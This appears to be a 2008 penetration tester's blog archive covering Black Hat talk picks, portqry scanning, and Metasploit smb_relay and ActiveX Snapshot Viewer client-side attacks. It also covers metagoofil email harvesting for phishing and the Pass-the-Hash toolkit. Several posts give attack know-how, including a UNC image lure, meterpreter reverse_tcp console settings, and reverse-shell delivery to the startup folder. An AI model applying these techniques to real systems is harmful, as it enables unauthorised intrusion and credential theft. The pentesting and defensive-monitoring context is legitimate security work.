Thursday, July 31, 2008

Blackhat USA 2008 Fantasy League Picks

Blackhat 2008 Fantasy League picks.

because I'm poor and my company is cheap i'm not making it to BH, but Wesley McGrew and I have decided to do our fantasy picks.

So here is the order I plan to pirate the BH videos in...

Day 1

10:00 - 11:00 Nmap: Scanning the Internet

11:15 - 12:30 Dan's talk will probably be too crowded so... Jinx: Malware 2.0

13:45 - 15:00 dunno....

15:15 - 16:30 Malware Analysis

16:45 - 18:00 Metapost exploitation **anything by val smith will be good

Day 2

10:00 - 11:00 Encoded, Layered and Transcoded Syntax Attacks: Threading the Needle Past Web Application Security

11:15 - 12:30 Circumventing Automated JavaScript Analysis Tools

13:45 15:00 Hacking and Injecting Federal Trojans

15:15 - 16:30 Most likely Jeremiah Grossman's talk or continue with Hacking and Injecting Federal Trojans

16:45 - 18:00 Pushing the Camel Through the Eye of a Needle or Methods for Understanding Targeted Attacks with Office Document

Tuesday, July 29, 2008

Its not nmap but it gets the job done -- portqry

Scanning once you are on the LAN can pose a problem. Nmap requires installing pcap and usually an interactive install (metacab is an option depending on scope) and some AV's will flag on those types of things (which is understandable). Since there is no native scanning capability in windows you are forced to either install something or upload a standalone binary. Foundstone's scanline is one option but its not one of my favorites. You can write your own and upload that but I'd hate to have some custom code submitted to some AV vendor by some motivated admin. Or you can upload Microsoft's portqry.

C:\>portqry -n -e 3389
Querying target system called:
Attempting to resolve name to IP address...
Name resolved to
TCP port 3389 (unknown service): LISTENING

Checking out the KB article on portqry will give you some of its more useful features.
Some fun options are its ability to send default ldap queries:

portqry -n myserver -p udp -e 389

UDP port 389 (unknown service): LISTENING or FILTERED
Sending LDAP query to UDP port 389...

LDAP query response:

currentdate: 12/13/2003 05:42:40 (unadjusted GMT)
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=domain,DC=example,DC=com
dsServiceName: CN=NTDS Settings,CN=myserver,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=domain,DC=example,DC=com
namingContexts: DC=domain,DC=example,DC=com
defaultNamingContext: DC=domain,DC=example,DC=com
schemaNamingContext: CN=Schema,CN=Configuration,DC=domain,DC=example,DC=com
configurationNamingContext: CN=Configuration,DC=domain,DC=example,DC=com
rootDomainNamingContext: DC=domain,DC=example,DC=com
supportedControl: 1.2.840.113556.1.4.319
supportedLDAPVersion: 3
supportedLDAPPolicies: MaxPoolThreads
highestCommittedUSN: 4259431
supportedSASLMechanisms: GSSAPI
serverName: CN=myserver,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=domain,DC=example,DC=com
supportedCapabilities: 1.2.840.113556.1.4.800
isSynchronized: TRUE
isGlobalCatalogReady: TRUE
domainFunctionality: 0
forestFunctionality: 0
domainControllerFunctionality: 2

======== End of LDAP query response ========

UDP port 389 is LISTENING

and "sqlpings"

portqry -n -e 1434 -p udp

You receive the following output:

Querying target system called:


UDP port 1434 (ms-sql-m service): LISTENING or FILTERED

Sending SQL Server query to UDP port 1434...

Server's response:

ServerName SQL-Server1
IsClustered No
Version 8.00.194
tcp 1433
np \\SQL-Server1\pipe\sql\query

==== End of SQL Server query response ====

UDP port 1434 is LISTENING

It also does snmp queries and ISA queries and evidently RPC end-point mapping as well.

There are other fun features and the localhost options are worth looking into as well.

Some of the not so fun stuff. No randomizing ports. You can do an ordered list or ranges but no random. ONLY ONE HOST AT A TIME :-( but that's what batch files are for.

If anyone else is using this for pentests please let me know your thoughts.

Additional information on metacab:

Monday, July 28, 2008

Passed My CISA

got word I passed my CISA.

ph33r me!

I'll pass on the certification hating, see my posts on CEH != competent pentester and CISSP != competent pentester...pretty much the same feelings on this one.

looks like I had already done a CISA i'll still spare you the hatin'

Sunday, July 27, 2008

The Importance Of Internal Monitoring

So last assessment I got caught on the first internal port scan. Seems that all the internal routing was done via static routes so when I tried to scan a subnet that wasn't being used those packets would hit the firewall and then create a syslog error which in turn would display on the big TV in the NOC. Bummer for me...of course I didn't know this at the time, I just knew they saw me.

Second try. I had 2 class B's to look at so I took one of the shells from the snapshot viewer exploit and had it ping .0 of every class C in the network range. Whatever replied I took as a "good" subnet and if it didn't I marked it as not having anything listening and removed it from subsequent scans. Did I miss some boxes? Probably...didn't matter in this case.

Armed with my new ranges, minus off limit ones and dead ones, I started a new nmap scan looking for just a few ports that I had exploits for and let it roll at a blistering T2 pace. It did its thing and finished like 40 hours later and then I did my thing trying to do some manual enumeration and exploitation.

I upped the intensity as the week went on and never had any other trouble or any of my "worker bees" taken off line for misbehaving. So all was good.

At the outbrief it was determined that I found a fatal flaw with their system that there was no internal IDS monitoring for suspicious activity on the LAN. Had their been I probably would have been seen again but they had figured that anyone getting into the network would make the same mistake I had made the first time and scan or try to exploit non-used networks and they would catch them. I lucked out that 1) my ping sweep wasn't logged (should have been) or wasn't noticed after the fact and 2) I had more than one box on the LAN...I figured it was 50/50 that I would get seen with the ping sweep and worst case it would lead back to one of their boxes and not mine.

So what's the point? You need something watching your internal network even if its for the straight up blatant shit that could be happening. Had something been in place they would have definitely caught later port scans, enumeration, and exploit attempts.

Friday, July 25, 2008

Its the end of the world as we know it...and I feel fine

I'm confused about what all the debate is over HD and I)ruid releasing exploit code.

Every time there is a new vulnerability WITHOUT code everyone wants to debate and bitch about the "real impact" because there is no exploit code. But as soon as exploit code comes out all the bloggers and security people get to do the "Patch Now!" post. SO, if the vulnerability is indeed as serious as people say it is...You should all be kissing HD's and I)ruid's asses for throwing out the ammunition to get the serious vulnerability patched in hurry.

Is the average fresh CEH graduate script kiddie going to pwn the internet with this aux module? Hell no. After they get a domain poisoned, they still have to launch some sort of client side attack, deliver some malware that won't get flagged by AV, secure the box, and manage all the bots. Is that realistic for the average "script kiddie"? I don't think so.

Maybe a real bad guy can make that happen, but to think that "real bad guys" didn't already have this exploit after all the talk about it is just plain asinine.

I'm personally glad i have at least another quarter of job security, this kind of fear mongering is always great for job security and buying new toys.

Richard Bejtlich wrote up a similar but better response to the issue:

**edit #2
Good writeup on the verizon security blog about the issue and possible scenarios.

Thursday, July 24, 2008

More On Leveraging Client-Side Exploits In Your Pentests--smb relay

g0ne has a horseshoe, I never get as lucky as he did/does on his pentests. You can read about his latest one here.

I on the other hand always seem to have to work for it. In addition to my little snapshotviewer code (previous post) I threw in a smb_relay attack via metasploit. This was to see if I could get lucky and catch some users doing the wrong thing like browsing the net or clicking on links in emails with admin credentials and to leverage our foothold we had gained with weak physical security (I now had a box on the local network).

If you unfamiliar with the exploit itself, here's the info from the module:

This module will relay SMB authentication requests to another host, gaining access to an authenticated SMB session if successful. If the connecting user is an administrator and network logins are allowed to the target machine, this module will execute an arbitrary payload. To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate. Unfortunately, this module is not able to clean up after itself. The service and payload file listed in the output will need to be manually removed after access has been gained. The service created by this tool uses a randomly chosen name and description, so the services list can become cluttered after repeated exploitation. The SMB authentication relay attack was first reported by Sir Dystic on March 31st, 2001 at @lanta.con in Atlanta, Georgia.


Simple enough to execute, start msf as root (needed to bind to 139), select payload, embed smb code into email or website, send email, cross fingers and wait.

The last post asked for code so here you go:

img src="\\networkIP\share\1.gif"

yep, that's some l33t shit right there...

For those of you that are more visual learners, I did a video last year for chicagocon as a demo here --smb_relay with reverse shell.

Issues, and there were some.

1. Most users wont have the permissions to actually create a service and run your payload, that's OK thats what the ActiveX attack was for.

2. Its messy, it leaves registry keys and executables on the box that "someone" will have to clean up.

3. My initial payload was a download and execute, which was supposed to grab the same .exe I was serving up for the ActiveX bug, for whatever reason that wasn't working (don't know why yet) so after a few failed attempts I switched to meterpreter payload. That led to issue 4.

4. With the way the exploit works it creates and calls a service, evidently there are issues with this because the service wont correctly respond to Windows (like status, start, stop) so Windows kills it after a period of time. Around 60 seconds for me. That's a bummer. More info here

The Fix: Thankfully there is a fix, but I found out about it after the fact. Once you select meterpreter as your payload you get a AutoRunScript option.

msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(smb_relay) > show advanced

Module advanced options:

Payload advanced options (windows/meterpreter/reverse_tcp):

Name : AutoLoadStdapi
Current Setting: true
Description : Automatically load the Stdapi extension

Name : AutoRunScript
Current Setting:
Description : Script to autorun on meterpreter session creation

migrate.rb, located in your meterpreter scripts directory will migrate to lsass by default, this should solve the shell dying on you problem. I haven't tested it though, but someone I trust told me this should solve the problem.

The patch in the above Framework-Hackers post may work as well, I haven't tried that either.

5. After meterpreter not working I moved to the 'ol standby of reverse shells which were stable and stuck around until I did what I needed to do and killed the session.

I didn't get as lucky as g0ne. Turned out that several admins had added their domain user account to the local admin group on their workstation, so while it allowed the exploit to succeed I didn't get any shells with (domain) elevated privs. :-(

Its still a useful (internal) attack vector, add the smb_relay to now being able to most likely point any subdomain to an IP of your choosing with the new baliwicked metasploit auxiliary modules and you can probably pull off a pretty good hack if you have local network access. Gotta love exploitable "features."

Wednesday, July 23, 2008

Leveraging Client-Side Exploits In Your Pentests

Wrapping up a pentest this week and got to do a little "user awareness training" with the current and unpatched ActiveX Control for Microsoft Access Snapshot Viewer exploit. Fsecure has a little writeup on it as well as securityfocus with POC code.

This one is nice because its a auto download exploit. You call the ActiveX control and it downloads the file you specify to the location you specify. This is a great exploit from a user training perspective because you can make the binary as benign or dangerous as you want. I of course shoved a reverse shell out over FBP (firewall bypass protocol aka TCP 443).

Delivery is simple enough, you create an email with a link (see my metagoofil post if you need help gathering those emails) and ask politely for users with elevated permissions on the network to click on it. You embed snapshot viewer code in that page, point the download location to somewhere fun like all users/startup, and tail -f /apache/access.log to see who browses the site, who enables the activeX control (your users do know better right? or you do have your default IE settings to high right?) and who downloads your binary. If all goes well, after lunch you'll have your shell :-)

POC code from secfocus:

Sunday, July 20, 2008

Adding your own exploits and modules in Metasploit

No not an exploit-dev 101 post but maybe an advanced tip for people new to using the Metasploit Framework. I see this question all the time so here is a little mini tutorial.

In Linux (For the love of god, don't run msf on Windows) when you install metasploit you get a hidden .msf(/home/$user/.msf) directory in your home directory.

It starts out empty, but this is where you want to place all updated exploit modules, auxiliary modules, meterpreter scripts, etc.

Why? Well if you start modifying exploits in the trunk when you do an update it will start bitching at you about it not being the same exploit and may possible overwrite your stuff and that's no fun.

Example time.

Say you want to add the "HP StorageWorks NSI Double Take Remote Overflow Exploit (meta)" exploit located on milworm. Its already in the trunk, so if you want to follow along you'll have to rm it.

What you have to do is create the same directory structure in your .msf folder as you have in your regular msf folder. So, looking at the exploit on milworm we see the path is:

class Exploits::Windows::Misc::Doubletake

So we cd into our .msf folder and create our modules folder (If you are lost, look at your regular msf folder and make a similar directory structure). Once we do that we need to create an exploits folder, a windows folder, and misc folder. Then we'll stick our doubletake.rb file into that folder.

cg@segfault:~/.msf3$ mkdir modules
cg@segfault:~/.msf3$ cd modules/
cg@segfault:~/.msf3/modules$ mkdir exploits
cg@segfault:~/.msf3/modules$ cd exploits/
cg@segfault:~/.msf3/modules/exploits$ mkdir windows
cg@segfault:~/.msf3/modules/exploits$ cd windows/
cg@segfault:~/.msf3/modules/exploits/windows$ mkdir misc
cg@segfault:~/.msf3/modules/exploits/windows$ cd misc
cg@segfault:~/.msf3/modules/exploits/windows/misc$ ls -l
total 4
-rw-r--r-- 1 cg cg 2277 2008-07-20 12:22 doubletake.rb

You don't need to mirror the directory structure completely, just add what you are adding. If you had Linux exploits you would add a linux folder in the exploits folder, since we don't its not necessary.

If everything worked right when you start the console you'll see one more exploit and you'll now be able use that exploit in the framework.


=[ msf v3.2-release
+ -- --=[ 302 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 73 aux


=[ msf v3.2-release
+ -- --=[ 303 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 73 aux

Now we can use the exploit.

msf > use exploit/windows/misc/doubletake
msf exploit(doubletake) > info

Name: doubletake Overflow
Version: 9
Platform: Windows
Privileged: No
License: Metasploit Framework License

Provided by:

Available targets:
Id Name
-- ----
0 doubletake 4.5.0
1 doubletake 4.4.2
2 doubletake

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 1100 yes The target port

Payload information:
Space: 500
Avoid: 1 characters

This Module Exploits a stack overflow in the authentication
mechanism of NSI Doubletake which is also rebranded as hp storage
works Vulnerability found by Titon of Bastard Labs.

msf exploit(doubletake) >

same thing goes for auxiliary modules, just make an auxiliary folder in the modules directory and populate it accordingly. Pretty much the same thing for meterpreter scripts except the scripts aren't in the modules directory they are in their own, so in this case we'd make our scripts/meterpreter directories in the main .msf directory.

Thursday, July 17, 2008

Lack of usable emails for your pentest got you down...metagoofil FTW!

Hopefully a useful day in the life of a pentest post...

So there I was, trying to gather emails for our pentest. The only problem is that we were doing an assessment of but all the emails are listed as Just for clarification, searching for email addresses wouldn't necessarily give me emails that were in scope, so I had to think of something.

First step was some google-fu of " +" that brought in a few emails addresses in. Next step was metagoofil. Metagoofil is awesome because it will download ms office, open office, and pdf documents from the domain you specify. It will parse the metadata and give you a list of the usernames in the documents and the path to where the document was saved.

How it works (images from the Edge-Security site)

It downloads the documents to your local computer so you can view them for extra info gatherings. It also gives you a nice little html page with the results.

After that I took the possible usernames, put them in the proper naming convention for the domain, rocketed off my SE email and crossed my fingers.

The result? Metagoofil for the win! Overall I had about 160 possible email addresses, 20 actually made it to someone's inbox...sad face but not bad considering how I got the possibles.

5 of the 20 opened it :-)
2 were forwarded (meaning the user that opened it was not initially emailed), 1 was from google, and 2 of the 5 were from metagoofil :-)

Not bad if you ask me.

Tuesday, July 15, 2008

McCain Can't Use the Internet

you know i don't require my elected leaders to be a NOP or be able to write an 0day but to not be able to "get online" or read email. :-(

how the F is someone that cant even get online supposed to be able to make good decisions for our country about all the different numbers of issues that come up with regard to the internet, privacy, security, etc

Thursday, July 3, 2008

Maltego for Information Gathering Part I

The first part of my article on Maltego for Information Gathering is available on

"According to their web site, "Paterva invents and sells unique data manipulation software. Paterva is headed by Roelof Temmingh who is leading a light and lethal team of talented software developers." On May 6 2008, they released a new version of a very kewl tool named Maltego.

"Maltego, is an open source intelligence and forensics application. It allows for the mining and gathering of information as well as the representation of this information in a meaningful way. Coupled with its graphing libraries, Maltego, allows you to identify key relationships between information and identify previously unknown relationships between them. It is a must-have tool in the and intelligence fields!"

Chris Gates' talk at ChicagoCon 2008s entitled "New School Information Gathering" touched on many tools and techniques. One of the tools he introduced to the audience is Maltego v2. This first in a two part series expands on this new tool with a basic introduction to Maltego followed by step-by-step personal recon tutorials. Part II will focus on infrastructure enumeration with Maltego."


Wednesday, July 2, 2008

Why would you tell the world when you go on vacation?

Its funny that most of the time security professionals would be the first ones to flame the jackass who turned on the out of office reply with all the details of where they are and when they will get back and let it reply to a mailing list. So I have to wonder why someone would announce to the world on their blog when they are taking a family vacation. Maybe they trust their home security vendor more than I do.

No link this time but its a recent post.

DeepSec 2007 talks are on google video

and here is the link. some really good talks in there.

24th CCC talks are also available:

'I've Got Nothing to Hide' and Other Misunderstandings of Privacy Paper

Here is a long but really good paper countering the "I have nothing to hide" argument.

From the abstract:

" In this short essay, written for a symposium in the San Diego Law Review, Professor Daniel Solove examines the nothing to hide argument. When asked about government surveillance and data mining, many people respond by declaring: "I've got nothing to hide." According to the nothing to hide argument, there is no threat to privacy unless the government uncovers unlawful activity, in which case a person has no legitimate justification to claim that it remain private. The nothing to hide argument and its variants are quite prevalent, and thus are worth addressing. In this essay, Solove critiques the nothing to hide argument and exposes its faulty underpinnings."


Pass The Hash Toolkit v1.4 released

What a great 4th of July present an update to pass the hash toolkit, now with XP SP3 support!

from the full disclosure announcement:

Source Code:

Win32 Binaries:


What's new?:

*Support for XP SP 3 for whosthere/iam (whosthere-alt/iam-alt work on xp sp3
without requiring any update)

*New -t switch for whosthere/whosthere-alt: establishes interval used
by the -i switch (by default 2 seconds).

*New -a switch for whosthere/iam: specify addresses to use. Format:
(WARNING!: if you use the wrong values the system may crash)
The idea is that, if you find yourself in a version of Windows where
whosthere/iam don't work (and iam-alt/whosthere-alt don't work
either); you can run LSASRV.DLL thru IDA, run the PASSTHEHASH.IDC
script included in the Pass-The-Hash toolkit, and use the addresses
found by the script with the -a switch.

This basically allows you to specify addresses at runtime to whosthere whithout
the need to recompile the tool.

*New -r switch for iam/iam-alt: Create a new logon session and run a
command with
the specified credentials (e.g.: -r cmd.exe)

*genhash now outputs hashes using the LM HASH:NT HASH format

*several bugfixes and stuff

between winexe, msf psexec, token stealing, and the pass the hash toolkit, you'll never have to crack another password ever again.